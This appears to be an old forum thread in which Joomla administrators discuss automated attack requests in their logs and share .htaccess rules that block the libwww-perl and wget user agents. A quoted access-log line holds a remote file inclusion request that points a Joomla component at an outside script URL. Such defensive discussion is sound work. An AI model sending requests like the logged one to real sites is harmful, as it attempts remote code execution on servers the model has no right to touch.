Somehow, me and most of the people that runs joomla starts to get lines like those on its logs:



This is part of a script to trigger up your joomla instalation to work as part of some sort of IRC bot, made by an argentinian who got is website closed due to phishing (nice guy, uh?).

For now I solved that issue by insert this lines on my .htaccess file:



I readed about other .htaccess way to block based on request, but since I don't know any real webbrowser based on libwww-perl, so I decided to block such client to access Joomla. You can also combine this with the .htaccess recomended on the top of the page.

Dear Sir,
Thank you for the code.
I have just pasted it in my .htaccess file
Regards,

Just a FYI: If the size of the returned page is 167 bytes, the user received a message like this:


No need to block those attempts, as they didn't do any harm anyway.

Yes, you're right, that's exactly the die response on those attempts.
However, and since someone may try with some other PERL script, I decided to close access to libwww-perl, I'm also concerning to restrict wget, the site aims for people not for scripts/bots.

Dear Sirarthur,
You are a hero .........
First time ever in my life as a helpless subject of hack attempts I felt happy after using your code.
My sincere thanks to you.
My raw access log reads today like this

82.165.177.145 - - [20/Nov/2006:09:21:47 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.1" 403 583 "-" "libwww-perl/5.79"

We want only human beings to use our site not any scripts
Kindly provide the other deny code you reffered about wget as well please.
Regards,

For deny any other user-agent you just need to add two lines

eg:
SetEnvIfNoCase User-Agent "^wget" no_wget

and then

Deny from env=no_wget

Adding this to the previous .htaccess will look like:

SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
SetEnvIfNoCase User-Agent "^wget" no_wget

Order Allow,Deny
Allow from all
Deny from env=no_perl
Deny from env=no_wget

I'm a little concerned with the syntax of the htaccess code there and the fact that it seems to overly complicate the htaccess to get the desired result.
It may also leave a loophole as well, considering it only seems to block GET and POST.. would a HEAD request on the url execute the exploit?

or, is it designed to work on servers that dont have MOD REWRITE?

HEAD doesn't output anything than the information of the size of the page called.

HEAD to my site's response:



GET method, same page:



You can check your server's response by http://tagsoup.com/cookbook/http/get-head/

You're right however about it could be a loophole, once the page's code may be full executed on a HEAD request.l The problem is that without any output the script will not be able to know if the exploit succeded or not.
But it's an easy to solve problem aswell, just add HEAD to the limit tag: